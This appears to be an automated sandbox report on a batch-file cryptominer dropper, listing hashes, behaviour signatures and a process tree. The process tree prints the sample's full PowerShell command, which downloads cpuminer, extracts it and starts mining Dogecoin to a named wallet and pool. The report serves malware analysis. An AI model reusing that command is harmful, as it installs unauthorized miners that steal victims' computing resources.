Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1793s -
max time network
1804s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
03/02/2024, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-en
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 10 5044 powershell.exe 12 5044 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2260 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2260 cpuminer-sse2.exe 2260 cpuminer-sse2.exe 2260 cpuminer-sse2.exe 2260 cpuminer-sse2.exe 2260 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5044 powershell.exe 5044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5044 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3744 wrote to memory of 5044 3744 cmd.exe 85 PID 3744 wrote to memory of 5044 3744 cmd.exe 85 PID 5044 wrote to memory of 3560 5044 powershell.exe 94 PID 5044 wrote to memory of 3560 5044 powershell.exe 94 PID 3560 wrote to memory of 2260 3560 cmd.exe 96 PID 3560 wrote to memory of 2260 3560 cmd.exe 96
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2260
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
507KB
MD595e06ecc2da194ea65ac5f846331efa7
SHA18a9f53fec35e901ba3a181d17d151bef63829300
SHA2567bb0f84b2ae3ec64b9ff7375d2bc86d46988d9dd08d751f306aa3cf9434ce129
SHA512b94c642575ab7dbc1de5fee8b3cb560ba0a5045448395eddf6231427cdfa04add7c3796a1d3f2c9b07da2b342d3b79695c2412cb2ce0f1e4723b17f34bd6d9c5
-
Filesize
267KB
MD57ed5b443ebbb6fb6bf5deb779a31b8ca
SHA167f42a7e4c6a0c20eb02c993cdb75c274e10a0b5
SHA256a5f0f72da4c572a0761a1decc11a6bd72bee578cb46daea089062dfc812f746e
SHA5125d7a8b9b2d7241ba6c15856dffdd7b6445efa16882258d100d7b91bdbf25e9709bdd80b901fe629410b1cc8672c7b3ae6a2cb35cfc860f25704dc09d9d11fa22
-
Filesize
199KB
MD55fa6de0505be34131ff98d1f36d8473d
SHA1d251d9d3330e68b8c1688592fd5f0dd48745df7d
SHA256108225011ee6c99a21b8cf9ab72d9915fe38ec032dddfda8f2679f2226911e70
SHA512c463ddfceb8d70859be2f8ba93877c3c3823aad35ae4e34c11d5ae5bd57d44d8d02e0479e2fbc51d974d6a3791be9bfc9af456db615b3774bc37f4a47089b643
-
Filesize
125KB
MD520d80611a3bfe2c411debc261f462bfa
SHA1443b598c493b328f11246d8aeacb7494c2ac226d
SHA2569f8cdfb7480fe75034619a40517d25c4d5dec22f31cac6bd39681b48b996b399
SHA512af3889b79f0173a1c758538062601c0d413d644d7d43c5b3f1356e540c9fa60dcab0658f336de1be6ddc9e603f213d8b19b378ad55a7aa5a9400067bb916496b
-
Filesize
334KB
MD58f78a350e61f9f7f6667560b7110c9b3
SHA14d94228e9143c8842c23e94b39b8a5942d29e31a
SHA25648307c39a415dc599b9f448e75d986c11e4e7c71e39202b2770488e82091d861
SHA5122701063e0c26e1867769b762543ee17453b13bddb14fad56b8c9283dab5851c352b979a5398cee705bb52051ef95e0784f048dd7d2259144a179fc63324955d3
-
Filesize
113KB
MD5dd5df3afd33e921b98228ee77d96ef06
SHA167ae53f9ec24abd12be9b6541b56cd897535ae5c
SHA2569701c8a3faa462a998e1bdc70d6c9add58ce6fceaba0e57b47f8cda038084019
SHA512d1080575e143c2d5b8f0e084d3d85657f570ee6a4629605cf4f1decf278b3586b21b0a50f6ce9f56c4407702b92eaee9ea751339a31712d6abcb5cc44e1b2563
-
Filesize
317KB
MD502aaf203fad6235cc91b39eae0c7a287
SHA1d9ecedafd3dcc2459de62a068acbd1faa1a21f82
SHA256feb39925c182fc96848b1c1bc2655cfd134ba219e76b3b8282f247b04053b07f
SHA51262984327303ec9a5c707684c66b296df210c0c11f2c683462d864b98766113695a00de7af1307e3a6cfb27d0b455b697f82e38c6e490af98ee0ab815daaf50b7
-
Filesize
1.0MB
MD5cce92ab280ecc3c1cbd53b4e3c4aaaee
SHA195f555a425ca2dd726e42913adc5012f493398ee
SHA25662744366b5d3dd4989892419f45fbd2aa0c34448160b673ff4430f006cb8fcc8
SHA512482c0d2ceb980985ac6257e9274261c8c9016a367dfcca5e1dec9da22fb974bbf79ac7d9df0ad0381f90d2b768d81a5039a2a9765b57ceffcfa67710f8dff6b1
-
Filesize
716KB
MD5878d1ae78a322f15e5dac720828254c7
SHA1555261001ccc2aa0feec5e696fb172c5838870d8
SHA256befb15134ebce5b8c1d965f75980509adf956ce5c093d88830aa2e23487d0757
SHA51240d3b9f7bbef63171090bb735927334fdf57ac9047d21dcf1b350974c04cebfeac25300e04059f80199a6ff221bea10c4b93e41d8c29e5578c825988cf19b016
-
Filesize
94KB
MD5373afd9b72355d0ad30924a69374c71c
SHA19d2a3ba3c852f42dfff2ba3f0f28a673e48e869e
SHA256e8ca4986566648892fd6cb1b3a9d43ca0a6a9c1dc7f0eca66af9693bff3ce2a9
SHA512ae79d1771e8cb75c939341263767abca877a6bdcef640f94fadb228a9b6e14eda773b4c27588774779b869310233a0e33dfef71f0fea09dcd68a1e0db440e6de
-
Filesize
92KB
MD5a6839c937d2938fad2fa3495b65f6284
SHA135fbeb0d43dcbc146be8dcb48382ac8f5248b796
SHA2561780e0333b7b76f454e77f11a3f96f52a5c08ae315b7df86ff5dc0c49bc2a904
SHA512103ea0c713aa1622d90cf80017f485a54170cf298cb743eaa46457f020d678eb3674bf9cbb6eb2824b0aaaa104ed278770a0ed3b6dc4b0f4cdbc60bed4052194